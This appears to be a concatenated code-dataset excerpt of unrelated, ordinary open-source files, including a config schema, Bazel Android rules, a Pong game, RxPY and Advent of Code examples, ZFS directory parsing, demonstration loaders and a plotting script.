        if operation == "send":
            # This is a useful hook for changing the SMTP server that is used by the mail queue. You
            # can, for example, connect to a 3rd party email relay to send emails. You can also just
            # connect to 127.0.0.1 (there's a mail server running on most of the INST servers).
            #
            # Arguments:
            #   smtp_server -- A smtplib.SMTP() object.
            #
            # Returns:
            #   An smtplib.SMTP() object (or compatible) that can be used to send mail.
            smtp_server = apply_filters("connect-to-smtp", smtplib.SMTP())
            smtp_server.sendmail(*payload)
            smtp_server.quit()
        else:
            logging.warning("Unknown operation requested in mailerqueue: %s" % operation)
# Module-level singleton used by send_template() above.
mailer_queue = MailerQueue()
def main():
    # Worker entry point: process queued emails forever.
    mailer_queue.run()
| 5,465 |
src/jf/schema.py
|
diseaz-joom/dsaflow
| 0 |
2024072
|
#!/usr/bin/python3
# -*- mode: python; coding: utf-8 -*-
from typing import List, Dict, TypeVar, Type, Optional, Generic, overload, Union, Callable, Protocol
import functools
from dsapy.algs import strconv
from jf import git
class Error(Exception):
    '''Base for errors in the module.'''
# Separator used when joining config path components into one flat key.
SEPARATOR = '.'
class Holder(Protocol):
    # Structural interface for a mutable, multi-valued config store:
    # each flat key maps to a list of string values.
    @property
    def config(self) -> Dict[str, List[str]]:
        raise NotImplementedError
    def set(self, name: str, value: str) -> None:
        raise NotImplementedError
    def reset(self, name: str, value: str) -> None:
        raise NotImplementedError
    def append(self, name: str, value: str) -> None:
        raise NotImplementedError
    def unset(self, name: str) -> None:
        raise NotImplementedError
class Cfg:
    # Thin wrapper giving subclasses access to the underlying Holder.
    def __init__(self, cfg: Holder) -> None:
        self.cfg = cfg
    @property
    def raw(self) -> Dict[str, List[str]]:
        # Raw key -> list-of-values mapping from the backing store.
        return self.cfg.config
class Path:
    # A config key path; components are joined with SEPARATOR lazily.
    def __init__(self, path: List[str]) -> None:
        self.path_list = path
    @functools.cached_property
    def path(self) -> str:
        return SEPARATOR.join(self.path_list)
class CfgPath(Cfg, Path):
    # A Holder reference plus a path extending *base*'s path.
    def __init__(self, base: 'CfgPath', path: List[str]) -> None:
        Cfg.__init__(self, base.cfg)
        Path.__init__(self, base.path_list + path)
class SectionCfg(CfgPath):
    @functools.cached_property
    def keys(self) -> List[str]:
        # Immediate child key names directly under this section's prefix.
        prefix = self.path + SEPARATOR
        return list({
            k[len(prefix):].partition(SEPARATOR)[0]
            for k in self.raw.keys()
            if k.startswith(prefix)
        })
TValue = TypeVar('TValue')
class ValueType(Protocol[TValue]):
    # Codec between the string-typed store and a Python value type.
    def from_string(self, s: str) -> TValue:
        raise NotImplementedError
    def to_string(self, v: TValue) -> str:
        raise NotImplementedError
class _SimpleType(Generic[TValue], ValueType[TValue]):
    # Codec built from a one-argument constructor; str() renders back.
    def __init__(self, t: Callable[[str], TValue]) -> None:
        self.t = t
    def from_string(self, s: str) -> TValue:
        return self.t(s)
    def to_string(self, v: TValue) -> str:
        return str(v)
class _BoolType(ValueType[bool]):
    # Booleans render lowercase ("true"/"false"); parsing goes through
    # strconv.parse_bool.
    def from_string(self, s: str) -> bool:
        return strconv.parse_bool(s)
    def to_string(self, v: bool) -> str:
        return str(v).lower()
# Shared codec singletons used by the schema field declarations below.
StrType = _SimpleType(str)
BranchType = _SimpleType(git.BranchName)
IntType = _SimpleType(int)
BoolType = _BoolType()
class MaybeValueCfg(Generic[TValue], CfgPath):
    """Optional scalar config value at a fixed path (None when unset)."""
    def __init__(self, base: CfgPath, path: List[str], t: ValueType[TValue]) -> None:
        CfgPath.__init__(self, base, path)
        self.t = t
    @functools.cached_property
    def value(self) -> Optional[TValue]:
        v_list = self.raw.get(self.path, [])
        if not v_list:
            return None
        return self.t.from_string(v_list[0])
    def set(self, value: TValue) -> None:
        self.cfg.set(self.path, self.t.to_string(value))
        # Invalidate the cached_property cache so a read after a write
        # does not return the stale pre-write value.
        self.__dict__.pop('value', None)
    def set_str(self, s: str) -> None:
        self.set(self.t.from_string(s))
class ValueCfg(Generic[TValue], CfgPath):
    """Scalar config value at a fixed path with a fallback *default*."""
    def __init__(self, base: CfgPath, path: List[str], t: ValueType[TValue], default: TValue) -> None:
        CfgPath.__init__(self, base, path)
        self.t = t
        self.default = default
    @functools.cached_property
    def value(self) -> TValue:
        v_list = self.raw.get(self.path, [])
        if not v_list:
            return self.default
        return self.t.from_string(v_list[0])
    def set(self, value: TValue) -> None:
        self.cfg.set(self.path, self.t.to_string(value))
        # Invalidate the cached_property cache so a read after a write
        # does not return the stale pre-write value.
        self.__dict__.pop('value', None)
    def set_str(self, s: str) -> None:
        self.set(self.t.from_string(s))
class ListValueCfg(Generic[TValue], CfgPath):
    """Multi-valued config entry at a fixed path."""
    def __init__(self, base: CfgPath, path: List[str], t: ValueType[TValue]) -> None:
        CfgPath.__init__(self, base, path)
        self.t = t
    @functools.cached_property
    def value(self) -> List[TValue]:
        return [self.t.from_string(v) for v in self.raw.get(self.path, [])]
    def set(self, value: List[TValue]) -> None:
        if not value:
            self.cfg.unset(self.path)
        else:
            # reset() replaces all existing values with the first item,
            # then the remainder are appended one by one.
            self.cfg.reset(self.path, self.t.to_string(value[0]))
            for v in value[1:]:
                self.cfg.append(self.path, self.t.to_string(v))
        # Invalidate the cached_property cache after any mutation so a
        # subsequent read reflects the write.
        self.__dict__.pop('value', None)
    def append(self, value: TValue) -> None:
        self.cfg.append(self.path, self.t.to_string(value))
        self.__dict__.pop('value', None)
    def set_str(self, ss: List[str]) -> None:
        self.set([self.t.from_string(s) for s in ss])
    def append_str(self, s: str) -> None:
        self.append(self.t.from_string(s))
class MapCfg(Generic[TValue], SectionCfg):
    # Section whose child keys map to values built on demand by *factory*.
    def __init__(
            self,
            base: CfgPath,
            path: List[str],
            factory: Callable[[CfgPath, List[str]], TValue],
    ) -> None:
        SectionCfg.__init__(self, base, path)
        self.factory = factory
    def __getitem__(self, name: str) -> TValue:
        # A fresh value is built per access (no memoization here).
        return self.factory(self, [name])
_NOT_FOUND = object()  # sentinel: distinguishes "not cached" from cached None
TCacher = TypeVar('TCacher', bound='Cacher')
class SchemaField:
    '''Base class to indicate schema fields.'''
class Cacher(Generic[TCacher, TValue], SchemaField):
    # Descriptor that computes a value once per instance and memoizes it
    # in the instance __dict__ (same technique as functools.cached_property).
    def __init__(self: TCacher) -> None:
        self.attrname = ''
    def __set_name__(self: TCacher, owner: type, name: str) -> None:
        # Record the attribute name at class-creation time; reusing one
        # descriptor under two different names is rejected.
        if not self.attrname:
            self.attrname = name
        elif name != self.attrname:
            raise TypeError(
                "Cannot assign the same Cacher to two different names "
                f"({self.attrname!r} and {name!r})."
            )
    @overload
    def __get__(self: TCacher, instance: None, owner: type) -> TCacher:
        pass
    @overload
    def __get__(self: TCacher, instance: SectionCfg, owner: type) -> TValue:
        pass
    def __get__(self: TCacher, instance: Optional[SectionCfg], owner: type) -> Union[TCacher, TValue]:
        # Class-level access returns the descriptor; instance access
        # returns the cached value, generating it on first use.
        if instance is None:
            return self
        cache = instance.__dict__
        val = cache.get(self.attrname, _NOT_FOUND)
        if val is _NOT_FOUND:
            val = self.generate(instance)
            cache[self.attrname] = val
        return val
    def generate(self: TCacher, instance: SectionCfg) -> TValue:
        # Subclasses produce the value to be cached.
        raise NotImplementedError
TSectionCfg = TypeVar('TSectionCfg', bound='SectionCfg')
class Section(Generic[TSectionCfg], Cacher['Section', TSectionCfg]):
    # Schema field: nested config section of type *t* at relative *path*.
    def __init__(self, t: Type[TSectionCfg], path: List[str]) -> None:
        Cacher.__init__(self)
        self.t = t
        self.path = path
    def generate(self, instance: SectionCfg) -> TSectionCfg:
        return self.t(instance, self.path)
class MaybeValue(Generic[TValue], Cacher['MaybeValue', MaybeValueCfg[TValue]]):
    # Schema field: optional scalar (None when unset).
    def __init__(self, t: ValueType[TValue], path: List[str]) -> None:
        Cacher.__init__(self)
        self.t = t
        self.path = path
    def generate(self, instance: SectionCfg) -> MaybeValueCfg[TValue]:
        return MaybeValueCfg(instance, self.path, self.t)
class Value(Generic[TValue], Cacher['Value', ValueCfg[TValue]]):
    # Schema field: scalar with a default.
    def __init__(self, t: ValueType[TValue], path: List[str], default: TValue) -> None:
        Cacher.__init__(self)
        self.t = t
        self.default = default
        self.path = path
    def generate(self, instance: SectionCfg) -> ValueCfg[TValue]:
        return ValueCfg(instance, self.path, self.t, self.default)
class ListValue(Generic[TValue], Cacher['ListValue', ListValueCfg[TValue]]):
    # Schema field: multi-valued entry.
    def __init__(self, t: ValueType[TValue], path: List[str]) -> None:
        Cacher.__init__(self)
        self.t = t
        self.path = path
    def generate(self, instance: SectionCfg) -> ListValueCfg[TValue]:
        return ListValueCfg(instance, self.path, self.t)
class Map(Generic[TValue], Cacher['Map', MapCfg[TValue]]):
    # Schema field: dynamic map of children built by *factory*.
    def __init__(self, factory: Callable[[CfgPath, List[str]], TValue], path: List[str]) -> None:
        Cacher.__init__(self)
        self.factory = factory
        self.path = path
    def generate(self, instance: SectionCfg) -> MapCfg[TValue]:
        return MapCfg(instance, self.path, self.factory)
class Root(SectionCfg):
    '''Config with schema.'''
    def __init__(self, cfg: Holder) -> None:
        # Top of the path hierarchy: empty path, direct Holder reference
        # (deliberately bypasses CfgPath.__init__, which needs a base).
        self.cfg = cfg
        self.path_list: List[str] = []
| 8,211 |
tools/build/rules/android.bzl
|
zakerinasab/gapid
| 1 |
2023725
|
# Copyright (C) 2018 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
load("//tools/build/rules:common.bzl", "copy")
# Wraps native.android_binary with a generated placeholder Java source so
# that purely-native dependency sets still build as an APK.
def android_native(name, deps=[], **kwargs):
    copied = name+"fake-src"
    copy(
        name=copied,
        src="//tools/build/rules:Ignore.java",
        dst="Ignore{}.java".format(name),
        visibility = ["//visibility:private"],
    )
    native.android_binary(
        name = name,
        deps = deps,
        manifest = "//tools/build/rules:AndroidManifest.xml",
        custom_package = "com.google.android.gapid.ignore",
        srcs = [":"+copied],
        **kwargs
    )
# Copies the per-CPU binaries of a split-configured cc dependency into
# <cpu>/<out> outputs and exposes one output group per CPU.
def _android_cc_binary_impl(ctx):
    outs = []
    groups = {}
    base = ctx.attr.out
    if base == "":
        base = ctx.label.name
    for cpu, binary in ctx.split_attr.dep.items():
        src = binary.files.to_list()[0]
        out = ctx.actions.declare_file(cpu + "/" + base)
        ctx.actions.run_shell(
            command = "cp \"" + src.path + "\" \"" + out.path + "\"",
            inputs = [src],
            outputs = [out]
        )
        outs += [out]
        groups[cpu] = [out]
    return [
        DefaultInfo(files = depset(outs)),
        OutputGroupInfo(**groups),
    ]
_android_cc_binary = rule(
    implementation = _android_cc_binary_impl,
    attrs = {
        "out": attr.string(),
        "dep": attr.label(
            # Split transition: the dep is built once per Android CPU.
            cfg = android_common.multi_cpu_configuration,
            allow_files = True,
        ),
    },
)
# Builds a cc_binary and fans it out per Android CPU via _android_cc_binary.
def android_native_binary(name, out = "", **kwargs):
    visibility = kwargs.pop("visibility", default = ["//visibility:public"])
    native.cc_binary(
        name = name + "-bin",
        visibility = ["//visibility:private"],
        **kwargs
    )
    _android_cc_binary(
        name = name,
        out = out,
        dep = ":" + name + "-bin",
        visibility = visibility,
    )
# Repository rule: exposes the NDK's native_app_glue sources as a
# cc_library by symlinking them out of $ANDROID_NDK_HOME.
def _android_native_app_glue_impl(ctx):
    ctx.symlink(
        ctx.path(ctx.os.environ["ANDROID_NDK_HOME"] +
                 "/sources/android/native_app_glue/android_native_app_glue.c"),
        "android_native_app_glue.c")
    ctx.symlink(
        ctx.path(ctx.os.environ["ANDROID_NDK_HOME"] +
                 "/sources/android/native_app_glue/android_native_app_glue.h"),
        "android_native_app_glue.h")
    ctx.file("BUILD", "\n".join([
        "cc_library(",
        "    name = \"native_app_glue\",",
        "    srcs = [\"android_native_app_glue.c\", \"android_native_app_glue.h\"],",
        "    hdrs = [\"android_native_app_glue.h\"],",
        "    visibility = [\"//visibility:public\"],",
        ")"
    ]))
android_native_app_glue = repository_rule(
    implementation = _android_native_app_glue_impl,
    # local + environ: re-evaluated when ANDROID_NDK_HOME changes.
    local = True,
    environ = [
        "ANDROID_NDK_HOME",
    ]
)
# Retrieve Vulkan validation layers from the Android NDK
# Repository rule: symlinks the prebuilt Vulkan validation layer .so files
# out of the NDK and generates one cc_library per ABI.
def _ndk_vk_validation_layer(ctx):
    build = ""
    for abi in ["armeabi-v7a", "arm64-v8a", "x86", "x86_64"]:
        for layer in ["core_validation", "object_tracker", "parameter_validation", "threading", "unique_objects"]:
            layerpath = abi + "/libVkLayer_" + layer + ".so"
            ctx.symlink(
                ctx.path(ctx.os.environ["ANDROID_NDK_HOME"] +
                         "/sources/third_party/vulkan/src/build-android/jniLibs/" + layerpath),
                ctx.path(layerpath),
            )
        build += "\n".join([
            "cc_library(",
            "    name = \"" + abi + "\",",
            "    srcs = glob([\"" + abi + "/libVkLayer*.so\"]),",
            "    visibility = [\"//visibility:public\"],",
            ")",
        ]) + "\n"
    ctx.file("BUILD", build)
ndk_vk_validation_layer = repository_rule(
    implementation = _ndk_vk_validation_layer,
    local = True,
    environ = [
        "ANDROID_NDK_HOME",
    ],
)
| 4,252 |
tests/test_ondiff.py
|
slarse/ondiff
| 0 |
2024712
|
import ondiff
def test_placeholder():
    """Placeholder test until there are some real tests."""
    # TODO Remove this test
    # A module object is always truthy; this only proves the import works.
    assert ondiff
| 146 |
pytglib/api/types/public_chat_type_is_location_based.py
|
iTeam-co/pytglib
| 6 |
2024650
|
from ..utils import Object
class PublicChatTypeIsLocationBased(Object):
    """
    The chat is public, because it is a location-based supergroup
    Attributes:
        ID (:obj:`str`): ``PublicChatTypeIsLocationBased``
    No parameters required.
    Returns:
        PublicChatType
    Raises:
        :class:`telegram.Error`
    """
    ID = "publicChatTypeIsLocationBased"
    def __init__(self, **kwargs):
        pass
    @staticmethod
    def read(q: dict, *args) -> "PublicChatTypeIsLocationBased":
        # The TL object carries no fields, so the payload dict is ignored.
        return PublicChatTypeIsLocationBased()
| 583 |
day1.py
|
jvansan/AdventOfCode2019
| 0 |
2023975
|
import math
from pathlib import Path
def read_file(fname):
    """Read module masses (one integer per line) from *fname* lazily."""
    lines = Path(fname).read_text().splitlines()
    return (int(line) for line in lines)
def calc_fuel(x):
    """Fuel needed for mass *x*: floor(x / 3) - 2.

    Integer floor division replaces math.floor(x/3.), which loses
    precision for very large integer masses.
    """
    return x // 3 - 2
def calc_fuel_with_fuel(x):
    """Total fuel for mass *x*, counting the fuel's own mass recursively.

    Masses whose fuel requirement is <= 0 contribute 0 (the original
    returned the negative intermediate value for x < 9).
    """
    total = 0
    fuel = calc_fuel(x)
    while fuel > 0:
        total += fuel
        fuel = calc_fuel(fuel)
    return total
def test_calc_fuel():
    """Spot-check calc_fuel against the Advent of Code day 1 examples."""
    cases = [(12, 2), (14, 2), (1969, 654), (100756, 33583)]
    for mass, expected in cases:
        assert calc_fuel(mass) == expected
def main():
    # Run test
    test_calc_fuel()
    inputs = list(read_file("./input/day1.txt"))
    # Part 1: plain fuel requirement per module mass.
    fuel = map(calc_fuel, inputs)
    print("Part 1:")
    print(f"Total fuel needed is : {sum(fuel)}")
    # Part 2: fuel also needs fuel for its own mass.
    print("Part 2:")
    all_fuel = map(calc_fuel_with_fuel, inputs)
    print(f"Total fuel needed (with fuel of fuel) is : {sum(all_fuel)}")
if __name__ == "__main__":
    main()
| 977 |
reactiveX/cpu_utilize.py
|
decaun/easy-python-study
| 1 |
2023510
|
import multiprocessing
import random
import time
from threading import current_thread
import rx
from rx.scheduler import ThreadPoolScheduler
from rx import operators as ops
def intense_calculation(value):
    """Simulate a long-running task by blocking 0.5-2.0 s, then echo *value*."""
    delay = random.randint(5, 20) * 0.1
    time.sleep(delay)
    return value
# calculate number of CPU's, then create a ThreadPoolScheduler with that number of threads
optimal_thread_count = multiprocessing.cpu_count()
pool_scheduler = ThreadPoolScheduler(optimal_thread_count)
# Create Process 1
# subscribe_on: the whole chain (including the sleeps) runs on the pool.
rx.of("Alpha", "Beta", "Gamma", "Delta", "Epsilon").pipe(
    ops.map(lambda s: intense_calculation(s)), ops.subscribe_on(pool_scheduler)
).subscribe(
    on_next=lambda s: print("PROCESS 1: {0} {1}".format(current_thread().name, s)),
    on_error=lambda e: print(e),
    on_completed=lambda: print("PROCESS 1 done!"),
)
# Create Process 2
rx.range(1, 10).pipe(
    ops.map(lambda s: intense_calculation(s)), ops.subscribe_on(pool_scheduler)
).subscribe(
    on_next=lambda i: print("PROCESS 2: {0} {1}".format(current_thread().name, i)),
    on_error=lambda e: print(e),
    on_completed=lambda: print("PROCESS 2 done!"),
)
# Create Process 3, which is infinite
# observe_on: only the stages after it hop onto the pool scheduler.
rx.interval(1).pipe(
    ops.map(lambda i: i * 100),
    ops.observe_on(pool_scheduler),
    ops.map(lambda s: intense_calculation(s)),
).subscribe(
    on_next=lambda i: print("PROCESS 3: {0} {1}".format(current_thread().name, i)),
    on_error=lambda e: print(e),
)
# Keep the main thread alive; the streams run on background threads.
input("Press any key to exit\n")
| 1,564 |
tprmp/utils/loading.py
|
anindex/tp-rmp
| 7 |
2022784
|
import pickle
import numpy as np
from tprmp.demonstrations.base import Demonstration
from tprmp.demonstrations.quaternion import q_convert_wxyz
from tprmp.demonstrations.manifold import Manifold
def load(demo_file):
    """Deserialize and return the pickled object stored at *demo_file*."""
    with open(demo_file, 'rb') as handle:
        return pickle.load(handle)
def save_demos(demo_file, trajs, traj_vels, frames, tags, dt=0.01):
    """Pickle demonstration trajectories, frames and tags to *demo_file*."""
    payload = {
        'trajs': trajs,
        'traj_vel': traj_vels,
        'frames': frames,
        'tags': tags,
        'dt': dt,
    }
    with open(demo_file, 'wb') as handle:
        pickle.dump(payload, handle)
def load_demos(data_file, smooth=True, tag=None, convert_wxyz=True):
    '''Load data into Demonstration class with format xyzwxyz'''
    data = load(data_file)
    dt = data['dt']
    demos = []
    if convert_wxyz:
        # Convert frame quaternions from xyzw to wxyz in place.
        # NOTE(review): assumes elements 3: of each pose hold the
        # quaternion components -- confirm against the recording format.
        for k, v in data['frames'].items():
            if isinstance(v, list):
                for m in range(len(v)):
                    v[m][3:] = q_convert_wxyz(v[m][3:]) # convert to wxyz
            else:
                v[3:] = q_convert_wxyz(v[3:])
    manifold = Manifold.get_manifold_from_name('R^3 x S^3')
    for m in range(len(data['trajs'])):
        # Optionally keep only the demos labeled with *tag*.
        if tag is not None and data['tags'][m] != tag:
            continue
        if convert_wxyz:
            data['trajs'][m][3:] = q_convert_wxyz(data['trajs'][m][3:])
        demo = Demonstration(data['trajs'][m], smooth=smooth, manifold=manifold, dt=dt, tag=data['tags'][m])
        # Frames may be per-demo lists or a single pose shared by all demos.
        for k, v in data['frames'].items():
            p = v[m] if isinstance(v, list) else v
            demo.add_frame_from_pose(p, k)
        demos.append(demo)
    return demos
def load_demos_2d(data_file, smooth=True, dt=0.01, first=True):
    '''Load 2d demonstrations'''
    data = load(data_file)
    demos = []
    manifold = Manifold.get_euclidean_manifold(2)
    if isinstance(data, list):
        data = np.array(data)
    # first=True: every demo shares the FIRST demo's start/end frames;
    # otherwise each demo uses its own first and last points.
    start_f, end_f = data[0][:, 0], data[0][:, -1]
    for d in data:
        demo = Demonstration(d, manifold=manifold, dt=dt)
        if first:
            demo.add_frame_from_pose(start_f, 'start')
            demo.add_frame_from_pose(end_f, 'end')
        else:
            demo.add_frame_from_pose(d[:, 0], 'start')
            demo.add_frame_from_pose(d[:, -1], 'end')
        demos.append(demo)
    return demos
| 2,243 |
zfs/posix/directory.py
|
mcclung/zfsp
| 600 |
2023845
|
import logging
import os
from typing import Iterator
from typing import Tuple
from typing import Any
from typing import Sequence
import pyndata
import zfs.posix
from . import PosixObject
from .attributes import PosixType
logger = logging.getLogger(__name__)
class DirectoryEntry(pyndata.Struct):
    # this is not a real on-disk struct
    __ENDIAN__ = 'little'
    name = pyndata.nullstring(max_length=256)
    value = pyndata.uint64()
    value.__SHOW__ = False
    # The 64-bit entry value packs the POSIX object type (4 bits at
    # offset 60) and the object number (low 48 bits).
    object_type = pyndata.BitField(value, 4, 60, enum=PosixType)
    number = pyndata.BitField(value, 48)
class Directory(PosixObject):
    # A POSIX directory whose children are resolved lazily from the
    # object set and memoized in resolved_entries.
    def __init__(self, dnode, entries, dataset, objectset, path=None):
        super().__init__(dnode, dataset)
        self.entries = entries
        self.path = path
        self.objectset = objectset
        self.resolved_entries = {}  # name -> resolved child object (cache)
    def __contains__(self, name: str) -> bool:
        return name in self.entries
    def __getitem__(self, name: str) -> Any:
        # Resolve *name* into an object, caching the result.
        joined_path = os.path.join(self.path, name)
        if name not in self.resolved_entries:
            try:
                entry_value = self.entries[name]
                entry = DirectoryEntry(name=name, value=entry_value)
                obj = self.objectset[entry.number]
                # Give file/directory children their full path for display.
                if isinstance(obj, (Directory, zfs.posix.File)):
                    obj.path = joined_path
                self.resolved_entries[name] = obj
            except Exception:
                # Any resolution failure is surfaced as a missing file.
                logger.warning('directory lookup failed for {}'.format(joined_path))
                raise FileNotFoundError(joined_path)
        return self.resolved_entries[name]
    def keys(self) -> Sequence[str]:
        return self.entries.keys()
    def items(self) -> Iterator[Tuple[str, Any]]:
        # Lazy: children are resolved only as the generator is consumed.
        return ((k, self[k]) for k in self.keys())
    def __repr__(self) -> str:
        return 'Directory {path} {entries}'.format(path=self.path, entries=list(self.keys()))
| 1,933 |
game.py
|
RosaleeKnight/pong
| 0 |
2023901
|
import pygame, sys, random
def ball_animation():
    # Advance the ball one frame and handle wall/paddle interactions.
    global ball_speed_x, ball_speed_y
    ball.x += ball_speed_x
    ball.y += ball_speed_y
    # Bounce off the top/bottom edges.
    if ball.top <= 0 or ball.bottom >= screen_height:
        ball_speed_y *= -1
    # Left/right edge means a point ended: recentre the ball.
    if ball.left <= 0 or ball.right >= screen_width:
        ball_restart()
    # Reverse horizontal direction on paddle contact.
    if ball.colliderect(player) or ball.colliderect(opponent):
        ball_speed_x *= -1
def player_animation():
    """Move the player's paddle by its current speed and clamp on-screen."""
    player.y += player_speed
    # Keep the paddle fully inside the window.
    player.top = max(player.top, 0)
    player.bottom = min(player.bottom, screen_height)
def opponent_ai():
    # Naive AI: step the paddle edges toward the ball's y position.
    # NOTE(review): both branches can fire in the same frame when the ball
    # is between top and bottom, so the paddle jitters slightly.
    if opponent.top < ball.y:
        opponent.top += opponent_speed
    if opponent.bottom > ball.y:
        opponent.bottom -= opponent_speed
    # Clamp to the window bounds.
    if opponent.top <= 0:
        opponent.top = 0
    if opponent.bottom >= screen_height:
        opponent.bottom = screen_height
def ball_restart():
    """Recentre the ball and randomize the sign of each velocity component."""
    global ball_speed_x, ball_speed_y
    ball.center = (screen_width / 2, screen_height / 2)
    ball_speed_y *= random.choice((1, -1))
    ball_speed_x *= random.choice((1, -1))
pygame.init()
clock = pygame.time.Clock()
# Window setup.
screen_width = 800
screen_height = 400
screen = pygame.display.set_mode((screen_width,screen_height))
pygame.display.set_caption('Pong')
# Game objects: the ball and the two paddles.
ball = pygame.Rect(screen_width/2 - 15,screen_height/2 - 15,30,30)
player = pygame.Rect(screen_width - 20,screen_height/2 - 70,10,140)
opponent = pygame.Rect(10,screen_height/2 - 70,10,140)
bg_color = pygame.Color('grey12')
light_grey = (200,200,200)
# The ball starts in a random diagonal direction.
ball_speed_x = 7 * random.choice((1,-1))
ball_speed_y = 7 * random.choice((1,-1))
player_speed = 0
opponent_speed = 7
# Main loop: input handling, simulation step, then drawing at 60 FPS.
while True:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            pygame.quit()
            sys.exit()
        # Arrow keys adjust the player's velocity; KEYUP undoes KEYDOWN.
        if event.type == pygame.KEYDOWN:
            if event.key == pygame.K_DOWN:
                player_speed += 7
            if event.key == pygame.K_UP:
                player_speed -= 7
        if event.type == pygame.KEYUP:
            if event.key == pygame.K_DOWN:
                player_speed -= 7
            if event.key == pygame.K_UP:
                player_speed += 7
    ball_animation()
    player_animation()
    opponent_ai()
    # Redraw the frame: background, paddles, ball and centre line.
    screen.fill(bg_color)
    pygame.draw.rect(screen,light_grey, player)
    pygame.draw.rect(screen,light_grey, opponent)
    pygame.draw.ellipse(screen,light_grey, ball)
    pygame.draw.aaline(screen,light_grey,(screen_width/2,0), (screen_width/2,screen_height))
    pygame.display.flip()
    clock.tick(60)
| 2,524 |
POO_I/aula2/ex_aula2_23_03_21/aula2.py
|
saul-rocha/POO_I
| 0 |
2022736
|
l1 = input("lado 1: ")
l2 = input("lado 2: ")
l3 = input("lado 3: ")
if l1 > (l2+l3) or l2 > (l1+l3) or l3 >(l2+l1):
print("Nao forma triangulo")
elif l1 == l2 and l1 == l3:
print("Equilátero")
elif l1 != l2 and l2 != l3 and l1 != l3:
print("Escaleno")
else:
print("Isoceles")
| 299 |
cnns/graphs/hessians/highest_eigenvalues.py
|
adam-dziedzic/time-series-ml
| 1 |
2023597
|
import matplotlib
# matplotlib.use('TkAgg')
matplotlib.rcParams['pdf.fonttype'] = 42
matplotlib.rcParams['ps.fonttype'] = 42
import matplotlib.pyplot as plt
import csv
import os
print(matplotlib.get_backend())
# plt.interactive(True)
# http://ksrowell.com/blog-visualizing-data/2012/02/02/optimal-colors-for-graphs/
MY_BLUE = (56, 106, 177)
MY_RED = (204, 37, 41)
MY_ORANGE = (218, 124, 48)
MY_GREEN = (62, 150, 81)
MY_BLACK = (83, 81, 84)
MY_GOLD = (148, 139, 61)
def get_color(COLOR_TUPLE_255):
    """Convert an 8-bit RGB tuple to matplotlib's 0-1 float channel list."""
    return [channel / 255 for channel in COLOR_TUPLE_255]
# fontsize=20
fontsize = 30
legend_size = 22
title_size = 30
font = {'size': fontsize}
matplotlib.rc('font', **font)
dir_path = os.path.dirname(os.path.realpath(__file__))
print("dir path: ", dir_path)
GPU_MEM_SIZE = 16280
wrt = 'inputs'
# wrt = 'model_parameters'
def read_columns(dataset, columns=5):
    # Parse a ';'-delimited file (relative to this script's directory)
    # into *columns* parallel float lists. The header row is skipped and
    # unparseable cells are reported and dropped.
    file_name = dir_path + "/" + dataset
    with open(file_name) as csvfile:
        data = csv.reader(csvfile, delimiter=";", quotechar='|')
        cols = []
        for column in range(columns):
            cols.append([])
        for i, row in enumerate(data):
            if i == 0:
                continue # omit the header
            for column in range(columns):
                try:
                    # print('column: ', column)
                    cols[column].append(float(row[column]))
                except ValueError as ex:
                    print("Exception: ", ex)
    return cols
def read_rows(dataset, row_nr=None):
    """Read a ';'-separated CSV (resolved relative to `dir_path`) row-wise.

    Args:
        dataset: file name relative to `dir_path`.
        row_nr: if given, stop once the 0-based row index exceeds it
            (i.e. keep rows 0..row_nr); if None, read the whole file.

    Returns:
        A list of rows, each a list of floats; non-numeric cells are
        reported and dropped.
    """
    file_name = dir_path + "/" + dataset
    rows = []
    with open(file_name) as csvfile:
        data = csv.reader(csvfile, delimiter=";", quotechar='|')
        for i, row in enumerate(data):
            # Bug fix: the original tested `if rows and i > row_nr`, which on
            # Python 3 raises TypeError (int > None) as soon as one row has
            # been collected and row_nr was left at None. Guard on row_nr.
            if row_nr is not None and i > row_nr:
                break
            result = []
            for val in row:
                try:
                    result.append(float(val))
                except ValueError as ex:
                    print("Exception: ", ex)
            rows.append(result)
    return rows
# String aliases used as dict keys in the per-curve config dicts below.
ylabel = "ylabel"
title = "title"
legend_pos = "center_pos"
bbox = "bbox"
file_name = "file_name"
column_nr = "column_nr"
row_nr = "row_nr"
labels = "labels"
legend_cols = "legend_cols"
xlim = "xlim"
ylim = "ylim"
# One config dict per curve: which eigenvalue dump to read and how to label it.
original = {  # ylabel: "L2 adv",
    # file_name: "../../nnlib/robustness/2019-09-11-21-11-34-525829-len-32-org-images-eigenvals",
    # file_name: "../../nnlib/robustness/2019-09-12-09-15-11-046445-len-32-org-images-eigenvals",
    # file_name: "../../nnlib/robustness/2019-09-12-09-39-58-229597-len-1-org_recovered-images-eigenvals",
    # file_name: "../../nnlib/robustness/2019-09-12-15-52-21-873237-len-5-org-images-eigenvals-min-avg-max",
    # file_name: "../../nnlib/robustness/2019-09-12-16-03-19-884343-len-17-org-images-eigenvals-confidence",
    file_name: "../../nnlib/robustness/2019-09-12-10-28-45-366327-len-62-org-images-highest_eigenvalues",
    title: "original",
    # legend_pos: "lower left",
    legend_pos: "upper right",
    # bbox: (0.0, 0.0),
    column_nr: 3,
    row_nr: 1,
    legend_cols: 3,
    labels: ['original'],
    xlim: (0, 100),
    ylim: (0, 100)}
adversarial = {  # ylabel: "L2 adv",
    # file_name: "../../nnlib/robustness/2019-09-11-21-11-34-525829-len-32-adv-images-eigenvals",
    # file_name: "../../nnlib/robustness/2019-09-12-09-15-11-040897-len-32-adv-images-eigenvals",
    # file_name: "../../nnlib/robustness/2019-09-12-09-39-58-229330-len-1-adv_recovered-images-eigenvals",
    # file_name: "../../nnlib/robustness/2019-09-12-15-52-21-871557-len-5-adv-images-eigenvals-min-avg-max",
    # file_name: "../../nnlib/robustness/2019-09-12-16-03-19-881953-len-17-adv-images-eigenvals-confidence",
    file_name: "../../nnlib/robustness/2019-09-12-10-28-45-352351-len-62-adv-images-highest_eigenvalues",
    title: "adversarial",
    # legend_pos: "lower left",
    legend_pos: "upper right",
    # bbox: (0.0, 0.0),
    column_nr: 3,
    row_nr: 1,
    legend_cols: 3,
    labels: ['adversarial'],
    xlim: (0, 100),
    ylim: (0, 100)}
gauss = {  # ylabel: "L2 adv",
